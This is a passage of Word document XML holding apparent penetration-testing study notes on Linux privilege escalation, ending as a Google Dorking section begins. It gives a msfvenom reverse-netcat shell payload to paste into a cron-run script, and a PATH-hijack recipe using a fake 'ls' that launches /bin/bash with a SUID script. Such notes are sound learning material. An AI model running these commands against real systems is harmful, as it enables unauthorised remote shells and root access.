    <w:p w14:paraId="6975E174" w14:textId="6A833796" w:rsidR="0000598C" w:rsidRPr="0084205E" w:rsidRDefault="0000598C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>create command that will return shell and paste to file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F86237" w14:textId="079186C6" w:rsidR="0000598C" w:rsidRPr="0084205E" w:rsidRDefault="0000598C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">create exploit using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="74EC00BD" w14:textId="3D885523" w:rsidR="0000598C" w:rsidRPr="0084205E" w:rsidRDefault="0000598C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>reverse_netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">=LOCALIP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>=8888 R</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3236E34D" w14:textId="0321A85F" w:rsidR="0000598C" w:rsidRPr="0084205E" w:rsidRDefault="0000598C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>copy and paste output into crontab file that is running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D44FDAF" w14:textId="59C20B17" w:rsidR="0000598C" w:rsidRPr="0084205E" w:rsidRDefault="0000598C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>echo &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> output&gt; &gt; &lt;script.sh&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04305BAF" w14:textId="592C8172" w:rsidR="00052912" w:rsidRPr="0084205E" w:rsidRDefault="00052912" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>in actual file directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6ECA88" w14:textId="263D6B70" w:rsidR="00052912" w:rsidRPr="0084205E" w:rsidRDefault="00052912" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>wait for shell to land (in accordance with crontab exe time)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4F6249" w14:textId="393934E6" w:rsidR="00052912" w:rsidRPr="0084205E" w:rsidRDefault="00052912" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Exploiting PATH variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AF2967" w14:textId="5A601F33" w:rsidR="00052912" w:rsidRPr="0084205E" w:rsidRDefault="00DC6276" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>PATH is an environmental variable in Linux/Unix-like operating systems which specifies directories that hold executable programs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3499C0D8" w14:textId="38ADB71B" w:rsidR="00DC6276" w:rsidRPr="0084205E" w:rsidRDefault="00DC6276" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>when users run any command in terminal, it searches for exe files with help of PATH variable in response to commands executed by user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5666B7" w14:textId="337B8498" w:rsidR="00DC6276" w:rsidRPr="0084205E" w:rsidRDefault="00DC6276" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>echo $PATH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249A8360" w14:textId="5956B707" w:rsidR="00DC6276" w:rsidRPr="0084205E" w:rsidRDefault="00DC6276" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Escalating Privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB87622" w14:textId="67061D7A" w:rsidR="00DC6276" w:rsidRPr="0084205E" w:rsidRDefault="00DC6276" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>re-writing PATH variable to location of attackers choosing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A5CF46" w14:textId="1B3775A3" w:rsidR="00DC6276" w:rsidRPr="0084205E" w:rsidRDefault="00DC6276" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>when a SUID binary calls the system shell to run an exe, it runs one attacker has written</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A8A031" w14:textId="13F70508" w:rsidR="00DC6276" w:rsidRPr="0084205E" w:rsidRDefault="00DC6276" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>any SUID file will run command with same privileges as the owner of the SUID file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5012E85B" w14:textId="7C17BFD7" w:rsidR="00DC6276" w:rsidRPr="0084205E" w:rsidRDefault="00DC6276" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36278BB9" w14:textId="3FB44093" w:rsidR="00DC6276" w:rsidRPr="0084205E" w:rsidRDefault="00AA6023" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>finding a script and determining its command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011E1735" w14:textId="09969943" w:rsidR="00AA6023" w:rsidRPr="0084205E" w:rsidRDefault="00AA6023" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">once determined, change to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71824CF8" w14:textId="471010B7" w:rsidR="00AA6023" w:rsidRPr="0084205E" w:rsidRDefault="00AA6023" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>create imitation exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5E1831" w14:textId="2A29F152" w:rsidR="00AA6023" w:rsidRPr="0084205E" w:rsidRDefault="00AA6023" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">echo </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&lt;”command</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> attacker wants to run”&gt; &gt; &lt;name of exe being imitated&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261BA876" w14:textId="5B54BD1D" w:rsidR="00AA6023" w:rsidRPr="0084205E" w:rsidRDefault="00AA6023" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ex. echo “/bin/bash” &gt; ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE7EF3B" w14:textId="13E8209B" w:rsidR="00AA6023" w:rsidRPr="0084205E" w:rsidRDefault="00AA6023" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> +x ls = makes it executable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B37973A" w14:textId="47498945" w:rsidR="00AA6023" w:rsidRPr="0084205E" w:rsidRDefault="00AA6023" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>now change PATH variable to point to directory where imitation is stored</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B23EFE9" w14:textId="6F646213" w:rsidR="00640EF4" w:rsidRPr="0084205E" w:rsidRDefault="00640EF4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>export PATH=/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>:$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>PATH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791375A6" w14:textId="0CEC5212" w:rsidR="00640EF4" w:rsidRPr="0084205E" w:rsidRDefault="00640EF4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>now every time “ls” is entered, a shell will be opened</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61154525" w14:textId="14D7A432" w:rsidR="00640EF4" w:rsidRPr="0084205E" w:rsidRDefault="00640EF4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC2D60D" w14:textId="0DF4E367" w:rsidR="00640EF4" w:rsidRPr="0084205E" w:rsidRDefault="00640EF4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>xport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>games:/usr/local/games:$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>PATH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C49A59" w14:textId="0ADCEBBE" w:rsidR="00640EF4" w:rsidRPr="0084205E" w:rsidRDefault="00640EF4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>to reset ls back to default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584C7E3C" w14:textId="223E8BD1" w:rsidR="00640EF4" w:rsidRPr="0084205E" w:rsidRDefault="00640EF4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">navigate back to directory where script is located and run it with </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>“./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>” and a shell will be created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5486A7FE" w14:textId="40E34923" w:rsidR="00640EF4" w:rsidRPr="0084205E" w:rsidRDefault="00640EF4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Expanding Knowledge of Linux </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Privesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6A79A81E" w14:textId="030BEA1D" w:rsidR="00640EF4" w:rsidRPr="0084205E" w:rsidRDefault="00640EF4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Create a Checklist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B21029E" w14:textId="381FBDD6" w:rsidR="00640EF4" w:rsidRPr="0084205E" w:rsidRDefault="00640EF4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>keep track of enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C29EFF" w14:textId="7767DE56" w:rsidR="00640EF4" w:rsidRPr="0084205E" w:rsidRDefault="00640EF4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>go-to list of helpful commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C97B22" w14:textId="389D86ED" w:rsidR="00640EF4" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidR="00640EF4" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/netbiosX/Checklists/blob/master/Linux-Privilege-Escalation.md</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="60100069" w14:textId="285FAF02" w:rsidR="00640EF4" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidR="00640EF4" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3911C812" w14:textId="3AE44A2E" w:rsidR="00640EF4" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidR="00640EF4" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3F2D6A5D" w14:textId="123D1602" w:rsidR="00640EF4" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidR="00640EF4" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://payatu.com/guide-linux-privilege-escalation</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0BE1C072" w14:textId="78162EE7" w:rsidR="00640EF4" w:rsidRPr="0084205E" w:rsidRDefault="00640EF4" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5478D554" w14:textId="6F7D3958" w:rsidR="00640EF4" w:rsidRPr="0084205E" w:rsidRDefault="008165D1" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Google Dorking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320DC75A" w14:textId="4AFE436E" w:rsidR="008165D1" w:rsidRPr="0084205E" w:rsidRDefault="008165D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>web crawlers/spiders scrap data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176DAB28" w14:textId="3D6F43E0" w:rsidR="008165D1" w:rsidRPr="0084205E" w:rsidRDefault="008165D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>indexing keywords via crawling</w:t>
      </w:r>
